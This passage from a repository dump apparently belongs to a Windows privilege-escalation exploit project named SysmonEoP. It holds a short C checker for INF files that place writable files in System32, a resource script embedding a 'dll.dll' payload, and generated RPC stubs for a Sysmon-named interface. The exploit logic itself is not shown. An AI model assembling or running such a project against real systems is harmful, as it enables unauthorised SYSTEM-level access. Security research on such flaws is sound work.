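        snprintf(out + used, cap - used, "%s%s", used ? "," : "", inf.sec[i].name);
        hits++;
    }
    return hits;
}

int main(void)
{
    char flagged[256];
    int n = scan_inf(SAMPLE_INF, flagged, sizeof flagged);
    printf("%d section(s) drop a low-priv-writable file into Windows/System32: %s\n", n, n ? flagged : "none");
    return 0;
}
```

Run against the sample it reports exactly one section, Test.CopyFiles: ReadOnly.CopyFiles also lands in System32 but only grants GR to Authenticated Users, and Elsewhere.CopyFiles grants GA but falls through to DefaultDestDir. The same check can be pointed at any INF a driver installer is about to process.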

================================================
FILE: v2/SysmonEoP/resource.h
================================================
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by FolderOrFileDeleteToSystem.rc
//
#define IDR_DLL1                        101

// Next default values for new objects
// 
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE        107
#define _APS_NEXT_COMMAND_VALUE         40001
#define _APS_NEXT_CONTROL_VALUE         1001
#define _APS_NEXT_SYMED_VALUE           101
#endif
#endif


================================================
FILE: v2/SysmonEoP/resource.rc
================================================
// Microsoft Visual C++ generated resource script.
//
#include "resource.h"

#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "winres.h"

/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
// English (United Kingdom) resources

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
#pragma code_page(1252)

#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//

1 TEXTINCLUDE
BEGIN
"resource.h\0"
END

2 TEXTINCLUDE
BEGIN
"#include ""winres.h""\r\n"
"\0"
END

3 TEXTINCLUDE
BEGIN
"\r\n"
"\0"
END

#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// RBS
//

IDR_DLL1                DLL                     "dll.dll"


#endif    // English (United Kingdom) resources
/////////////////////////////////////////////////////////////////////////////



#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//


/////////////////////////////////////////////////////////////////////////////
#endif    // not APSTUDIO_INVOKED


================================================
FILE: v2/SysmonEoP/sysmon.idl
================================================
[
	uuid(1e72d56f-eec6-44d3-bbed-5caa50790812),
	version(1.0),
]
interface DefaultIfName
{

	long Proc0(
	);

	void Proc1(
		[in]long arg_0,
		[in][string]  wchar_t* arg_1);
}

================================================
FILE: v2/SysmonEoP/sysmon_c.c
================================================


/* this ALWAYS GENERATED file contains the RPC client stubs */


 /* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for sysmon.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#if defined(_M_AMD64)


#if _MSC_VER >= 1200
#pragma warning(push)
#endif

#pragma warning( disable: 4211 )  /* redefine extern to static */
#pragma warning( disable: 4232 )  /* dllimport identity*/
#pragma warning( disable: 4024 )  /* array to pointer mapping*/

#include <string.h>

#include "sysmon_h.h"

#define TYPE_FORMAT_STRING_SIZE   7                                 
#define PROC_FORMAT_STRING_SIZE   79                                
#define EXPR_FORMAT_STRING_SIZE   1                                 
#define TRANSMIT_AS_TABLE_SIZE    0            
#define WIRE_MARSHAL_TABLE_SIZE   0            

typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];
    } sysmon_MIDL_TYPE_FORMAT_STRING;

typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];
    } sysmon_MIDL_PROC_FORMAT_STRING;

typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
    {
    long          Pad;
    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];
    } sysmon_MIDL_EXPR_FORMAT_STRING;


static const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};

static const RPC_SYNTAX_IDENTIFIER  _NDR64_RpcTransferSyntax = 
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};



extern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;
extern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;
extern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;

#define GENERIC_BINDING_TABLE_SIZE   0            


/* Standard interface: DefaultIfName, ver. 1.0,
   GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */

 extern const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo;


static const RPC_CLIENT_INTERFACE DefaultIfName___RpcClientInterface =
    {
    sizeof(RPC_CLIENT_INTERFACE),
    {{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    0,
    0,
    0,
    0,
    &DefaultIfName_ProxyInfo,
    0x02000000
    };
RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcClientInterface;

extern const MIDL_STUB_DESC DefaultIfName_StubDesc;

static RPC_BINDING_HANDLE DefaultIfName__MIDL_AutoBindHandle;


long Proc0( 
    /* [in] */ handle_t IDL_handle)
{

    CLIENT_CALL_RETURN _RetVal;

    _RetVal = NdrClientCall3(
                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,
                  0,
                  0,
                  IDL_handle);
    return ( long  )_RetVal.Simple;
    
}


void Proc1( 
    /* [in] */ handle_t IDL_handle,
    /* [in] */ long arg_0,
    /* [string][in] */ wchar_t *arg_1)
{

    NdrClientCall3(
                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,
                  1,
                  0,
                  IDL_handle,
                  arg_0,
                  arg_1);
    
}


#if !defined(__RPC_WIN64__)
#error  Invalid build platform for this stub.
#endif

static const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =
    {
        0,
        {

	/* Procedure Proc0 */

			0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/*  2 */	NdrFcLong( 0x0 ),	/* 0 */
/*  6 */	NdrFcShort( 0x0 ),	/* 0 */
/*  8 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
/* 10 */	0x32,		/* FC_BIND_PRIMITIVE */
			0x0,		/* 0 */
/* 12 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
/* 14 */	NdrFcShort( 0x0 ),	/* 0 */
/* 16 */	NdrFcShort( 0x8 ),	/* 8 */
/* 18 */	0x44,		/* Oi2 Flags:  has return, has ext, */
			0x1,		/* 1 */
/* 20 */	0xa,		/* 10 */
			0x1,		/* Ext Flags:  new corr desc, */
/* 22 */	NdrFcShort( 0x0 ),	/* 0 */
/* 24 */	NdrFcShort( 0x0 ),	/* 0 */
/* 26 */	NdrFcShort( 0x0 ),	/* 0 */
/* 28 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Return value */

/* 30 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 32 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
/* 34 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure Proc1 */

/* 36 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 38 */	NdrFcLong( 0x0 ),	/* 0 */
/* 42 */	NdrFcShort( 0x1 ),	/* 1 */
/* 44 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
/* 46 */	0x32,		/* FC_BIND_PRIMITIVE */
			0x0,		/* 0 */
/* 48 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
/* 50 */	NdrFcShort( 0x8 ),	/* 8 */
/* 52 */	NdrFcShort( 0x0 ),	/* 0 */
/* 54 */	0x42,		/* Oi2 Flags:  clt must size, has ext, */
			0x2,		/* 2 */
/* 56 */	0xa,		/* 10 */
			0x1,		/* Ext Flags:  new corr desc, */
/* 58 */	NdrFcShort( 0x0 ),	/* 0 */
/* 60 */	NdrFcShort( 0x0 ),	/* 0 */
/* 62 */	NdrFcShort( 0x0 ),	/* 0 */
/* 64 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter arg_0 */

/* 66 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 68 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
/* 70 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter arg_1 */

/* 72 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 74 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
/* 76 */	NdrFcShort( 0x4 ),	/* Type Offset=4 */

			0x0
        }
    };

static const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =
    {
        0,
        {
			NdrFcShort( 0x0 ),	/* 0 */
/*  2 */	
			0x11, 0x8,	/* FC_RP [simple_pointer] */
/*  4 */	
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */

			0x0
        }
    };

static const unsigned short DefaultIfName_FormatStringOffsetTable[] =
    {
    0,
    36
    };



#endif /* defined(_M_AMD64)*/



/* this ALWAYS GENERATED file contains the RPC client stubs */


 /* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for sysmon.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#if defined(_M_AMD64)




#if !defined(__RPC_WIN64__)
#error  Invalid build platform for this stub.
#endif


#include "ndr64types.h"
#include "pshpack8.h"


typedef 
struct _NDR64_CONFORMANT_STRING_FORMAT
__midl_frag7_t;
extern const __midl_frag7_t __midl_frag7;

typedef 
struct _NDR64_POINTER_FORMAT
__midl_frag6_t;
extern const __midl_frag6_t __midl_frag6;

typedef 
NDR64_FORMAT_CHAR
__midl_frag5_t;
extern const __midl_frag5_t __midl_frag5;

typedef 
struct 
{
    struct _NDR64_PROC_FORMAT frag1;
    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
    struct _NDR64_PARAM_FORMAT frag3;
    struct _NDR64_PARAM_FORMAT frag4;
}
__midl_frag4_t;
extern const __midl_frag4_t __midl_frag4;

typedef 
struct 
{
    struct _NDR64_PROC_FORMAT frag1;
    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
    struct _NDR64_PARAM_FORMAT frag3;
}
__midl_frag2_t;
extern const __midl_frag2_t __midl_frag2;

typedef 
NDR64_FORMAT_UINT32
__midl_frag1_t;
extern const __midl_frag1_t __midl_frag1;

static const __midl_frag7_t __midl_frag7 =
{ 
/* *wchar_t */
    { 
    /* *wchar_t */
        0x64,    /* FC64_CONF_WCHAR_STRING */
        { 
        /* *wchar_t */
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0
        },
        (NDR64_UINT16) 2 /* 0x2 */
    }
};

static const __midl_frag6_t __midl_frag6 =
{ 
/* *wchar_t */
    0x20,    /* FC64_RP */
    (NDR64_UINT8) 0 /* 0x0 */,
    (NDR64_UINT16) 0 /* 0x0 */,
    &__midl_frag7
};

static const __midl_frag5_t __midl_frag5 =
0x5    /* FC64_INT32 */;

static const __midl_frag4_t __midl_frag4 =
{ 
/* Proc1 */
    { 
    /* Proc1 */      /* procedure Proc1 */
        (NDR64_UINT32) 17039424 /* 0x1040040 */,    /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */
        (NDR64_UINT32) 24 /* 0x18 */ ,  /* Stack size */
        (NDR64_UINT32) 8 /* 0x8 */,
        (NDR64_UINT32) 0 /* 0x0 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 2 /* 0x2 */,
        (NDR64_UINT16) 8 /* 0x8 */
    },
    { 
    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
        { 
        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
            0x72,    /* FC64_BIND_PRIMITIVE */
            (NDR64_UINT8) 0 /* 0x0 */,
            0 /* 0x0 */,   /* Stack offset */
            (NDR64_UINT8) 0 /* 0x0 */,
            (NDR64_UINT8) 0 /* 0x0 */
        },
        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */
    },
    { 
    /* arg_0 */      /* parameter arg_0 */
        &__midl_frag5,
        { 
        /* arg_0 */
            0,
            0,
            0,
            1,
            0,
            0,
            1,
            1,
            0,
            0,
            0,
            0,
            0,
            (NDR64_UINT16) 0 /* 0x0 */,
            0
        },    /* [in], Basetype, ByValue */
        (NDR64_UINT16) 0 /* 0x0 */,
        8 /* 0x8 */,   /* Stack offset */
    },
    { 
    /* arg_1 */      /* parameter arg_1 */
        &__midl_frag7,
        { 
        /* arg_1 */
            1,
            1,
            0,
            1,
            0,
            0,
            0,
            0,
            1,
            0,
            0,
            0,
            0,
            (NDR64_UINT16) 0 /* 0x0 */,
            0
        },    /* MustSize, MustFree, [in], SimpleRef */
        (NDR64_UINT16) 0 /* 0x0 */,
        16 /* 0x10 */,   /* Stack offset */
    }
};

static const __midl_frag2_t __midl_frag2 =
{ 
/* Proc0 */
    { 
    /* Proc0 */      /* procedure Proc0 */
        (NDR64_UINT32) 17301568 /* 0x1080040 */,    /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */
        (NDR64_UINT32) 16 /* 0x10 */ ,  /* Stack size */
        (NDR64_UINT32) 0 /* 0x0 */,
        (NDR64_UINT32) 8 /* 0x8 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 1 /* 0x1 */,
        (NDR64_UINT16) 8 /* 0x8 */
    },
    { 
    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
        { 
        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
            0x72,    /* FC64_BIND_PRIMITIVE */
            (NDR64_UINT8) 0 /* 0x0 */,
            0 /* 0x0 */,   /* Stack offset */
            (NDR64_UINT8) 0 /* 0x0 */,
            (NDR64_UINT8) 0 /* 0x0 */
        },
        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */
    },
    { 
    /* long */      /* parameter long */
        &__midl_frag5,
        { 
        /* long */
            0,
            0,
            0,
            0,
            1,
            1,
            1,
            1,
            0,
            0,
            0,
            0,
            0,
            (NDR64_UINT16) 0 /* 0x0 */,
            0
        },    /* [out], IsReturn, Basetype, ByValue */
        (NDR64_UINT16) 0 /* 0x0 */,
        8 /* 0x8 */,   /* Stack offset */
    }
};

static const __midl_frag1_t __midl_frag1 =
(NDR64_UINT32) 0 /* 0x0 */;


#include "poppack.h"


static const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =
    {
    &__midl_frag2,
    &__midl_frag4
    };


static const MIDL_STUB_DESC DefaultIfName_StubDesc = 
    {
    (void *)& DefaultIfName___RpcClientInterface,
    MIDL_user_allocate,
    MIDL_user_free,
    &DefaultIfName__MIDL_AutoBindHandle,
    0,
    0,
    0,
    0,
    sysmon__MIDL_TypeFormatString.Format,
    1, /* -error bounds_check flag */
    0x60001, /* Ndr library version */
    0,
    0x801026e, /* MIDL Version 8.1.622 */
    0,
    0,
    0,  /* notify & notify_flag routine table */
    0x2000001, /* MIDL flag */
    0, /* cs routines */
    (void *)& DefaultIfName_ProxyInfo,   /* proxy/server info */
    0
    };

static const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [  2 ] = 
    {
    {
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    0,
    sysmon__MIDL_ProcFormatString.Format,
    DefaultIfName_FormatStringOffsetTable,
    sysmon__MIDL_TypeFormatString.Format,
    0,
    0,
    0
    }
    ,{
    {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},
    0,
    0 ,
    (unsigned short *) DefaultIfName_Ndr64ProcTable,
    0,
    0,
    0,
    0
    }
    };

static const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo =
    {
    &DefaultIfName_StubDesc,
    sysmon__MIDL_ProcFormatString.Format,
    DefaultIfName_FormatStringOffsetTable,
    (RPC_SYNTAX_IDENTIFIER*)&_RpcTransferSyntax,
    2,
    (MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo
    
    };

#if _MSC_VER >= 1200
#pragma warning(pop)
#endif


#endif /* defined(_M_AMD64)*/



================================================
FILE: v2/SysmonEoP/sysmon_h.h
================================================


/* this ALWAYS GENERATED file contains the definitions for the interfaces */


 /* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for sysmon.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */



/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */


#ifndef __sysmon_h_h__
#define __sysmon_h_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

/* Forward Declarations */ 

#ifdef __cplusplus
extern "C"{
#endif 


#ifndef __DefaultIfName_INTERFACE_DEFINED__
#define __DefaultIfName_INTERFACE_DEFINED__

/* interface DefaultIfName */
/* [version][uuid] */ 

long Proc0( 
    /* [in] */ handle_t IDL_handle);

void Proc1( 
    /* [in] */ handle_t IDL_handle,
    /* [in] */ long arg_0,
    /* [string][in] */ wchar_t *arg_1);



extern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec;
extern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec;
#endif /* __DefaultIfName_INTERFACE_DEFINED__ */

/* Additional Prototypes for ALL interfaces */

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif




================================================
FILE: v2/SysmonEoP/sysmon_s.c
================================================


/* this ALWAYS GENERATED file contains the RPC server stubs */


 /* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for sysmon.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#if defined(_M_AMD64)


#if _MSC_VER >= 1200
#pragma warning(push)
#endif

#pragma warning( disable: 4211 )  /* redefine extern to static */
#pragma warning( disable: 4232 )  /* dllimport identity*/
#pragma warning( disable: 4024 )  /* array to pointer mapping*/

#include <string.h>
#include "sysmon_h.h"

#define TYPE_FORMAT_STRING_SIZE   7                                 
#define PROC_FORMAT_STRING_SIZE   79                                
#define EXPR_FORMAT_STRING_SIZE   1                                 
#define TRANSMIT_AS_TABLE_SIZE    0            
#define WIRE_MARSHAL_TABLE_SIZE   0            

typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];
    } sysmon_MIDL_TYPE_FORMAT_STRING;

typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];
    } sysmon_MIDL_PROC_FORMAT_STRING;

typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
    {
    long          Pad;
    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];
    } sysmon_MIDL_EXPR_FORMAT_STRING;


static const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};

static const RPC_SYNTAX_IDENTIFIER  _NDR64_RpcTransferSyntax = 
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};


extern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;
extern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;
extern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;

/* Standard interface: DefaultIfName, ver. 1.0,
   GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */


extern const MIDL_SERVER_INFO DefaultIfName_ServerInfo;

extern const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable;

static const RPC_SERVER_INTERFACE DefaultIfName___RpcServerInterface =
    {
    sizeof(RPC_SERVER_INTERFACE),
    {{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,
    0,
    0,
    0,
    &DefaultIfName_ServerInfo,
    0x06000000
    };
RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcServerInterface;

extern const MIDL_STUB_DESC DefaultIfName_StubDesc;


#if !defined(__RPC_WIN64__)
#error  Invalid build platform for this stub.
#endif

static const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =
    {
        0,
        {

	/* Procedure Proc0 */

			0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/*  2 */	NdrFcLong( 0x0 ),	/* 0 */
/*  6 */	NdrFcShort( 0x0 ),	/* 0 */
/*  8 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
/* 10 */	0x32,		/* FC_BIND_PRIMITIVE */
			0x0,		/* 0 */
/* 12 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
/* 14 */	NdrFcShort( 0x0 ),	/* 0 */
/* 16 */	NdrFcShort( 0x8 ),	/* 8 */
/* 18 */	0x44,		/* Oi2 Flags:  has return, has ext, */
			0x1,		/* 1 */
/* 20 */	0xa,		/* 10 */
			0x1,		/* Ext Flags:  new corr desc, */
/* 22 */	NdrFcShort( 0x0 ),	/* 0 */
/* 24 */	NdrFcShort( 0x0 ),	/* 0 */
/* 26 */	NdrFcShort( 0x0 ),	/* 0 */
/* 28 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Return value */

/* 30 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 32 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
/* 34 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure Proc1 */

/* 36 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 38 */	NdrFcLong( 0x0 ),	/* 0 */
/* 42 */	NdrFcShort( 0x1 ),	/* 1 */
/* 44 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
/* 46 */	0x32,		/* FC_BIND_PRIMITIVE */
			0x0,		/* 0 */
/* 48 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
/* 50 */	NdrFcShort( 0x8 ),	/* 8 */
/* 52 */	NdrFcShort( 0x0 ),	/* 0 */
/* 54 */	0x42,		/* Oi2 Flags:  clt must size, has ext, */
			0x2,		/* 2 */
/* 56 */	0xa,		/* 10 */
			0x1,		/* Ext Flags:  new corr desc, */
/* 58 */	NdrFcShort( 0x0 ),	/* 0 */
/* 60 */	NdrFcShort( 0x0 ),	/* 0 */
/* 62 */	NdrFcShort( 0x0 ),	/* 0 */
/* 64 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter arg_0 */

/* 66 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 68 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
/* 70 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter arg_1 */

/* 72 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 74 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
/* 76 */	NdrFcShort( 0x4 ),	/* Type Offset=4 */

			0x0
        }
    };

static const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =
    {
        0,
        {
			NdrFcShort( 0x0 ),	/* 0 */
/*  2 */	
			0x11, 0x8,	/* FC_RP [simple_pointer] */
/*  4 */	
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */

			0x0
        }
    };

static const unsigned short DefaultIfName_FormatStringOffsetTable[] =
    {
    0,
    36
    };


static const RPC_DISPATCH_FUNCTION DefaultIfName_table[] =
    {
    NdrServerCall2,
    NdrServerCall2,
    0
    };
static const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable = 
    {
    2,
    (RPC_DISPATCH_FUNCTION*)DefaultIfName_table
    };


#endif /* defined(_M_AMD64)*/



/* this ALWAYS GENERATED file contains the RPC server stubs */


 /* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for sysmon.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#if defined(_M_AMD64)




#if !defined(__RPC_WIN64__)
#error  Invalid build platform for this stub.
#endif


#include "ndr64types.h"
#include "pshpack8.h"


typedef 
struct _NDR64_CONFORMANT_STRING_FORMAT
__midl_frag7_t;
extern const __midl_frag7_t __midl_frag7;

typedef 
struct _NDR64_POINTER_FORMAT
__midl_frag6_t;
extern const __midl_frag6_t __midl_frag6;

typedef 
NDR64_FORMAT_CHAR
__midl_frag5_t;
extern const __midl_frag5_t __midl_frag5;

typedef 
struct 
{
    struct _NDR64_PROC_FORMAT frag1;
    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
    struct _NDR64_PARAM_FORMAT frag3;
    struct _NDR64_PARAM_FORMAT frag4;
}
__midl_frag4_t;
extern const __midl_frag4_t __midl_frag4;

typedef 
struct 
{
    struct _NDR64_PROC_FORMAT frag1;
    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
    struct _NDR64_PARAM_FORMAT frag3;
}
__midl_frag2_t;
extern const __midl_frag2_t __midl_frag2;

typedef 
NDR64_FORMAT_UINT32
__midl_frag1_t;
extern const __midl_frag1_t __midl_frag1;

static const __midl_frag7_t __midl_frag7 =
{ 
/* *wchar_t */
    { 
    /* *wchar_t */
        0x64,    /* FC64_CONF_WCHAR_STRING */
        { 
        /* *wchar_t */
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0
        },
        (NDR64_UINT16) 2 /* 0x2 */
    }
};

static const __midl_frag6_t __midl_frag6 =
{ 
/* *wchar_t */
    0x20,    /* FC64_RP */
    (NDR64_UINT8) 0 /* 0x0 */,
    (NDR64_UINT16) 0 /* 0x0 */,
    &__midl_frag7
};

static const __midl_frag5_t __midl_frag5 =
0x5    /* FC64_INT32 */;

static const __midl_frag4_t __midl_frag4 =
{ 
/* Proc1 */
    { 
    /* Proc1 */      /* procedure Proc1 */
        (NDR64_UINT32) 17039424 /* 0x1040040 */,    /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */
        (NDR64_UINT32) 24 /* 0x18 */ ,  /* Stack size */
        (NDR64_UINT32) 8 /* 0x8 */,
        (NDR64_UINT32) 0 /* 0x0 */,
        (NDR64_UINT16) 0 /* 0x0 */,
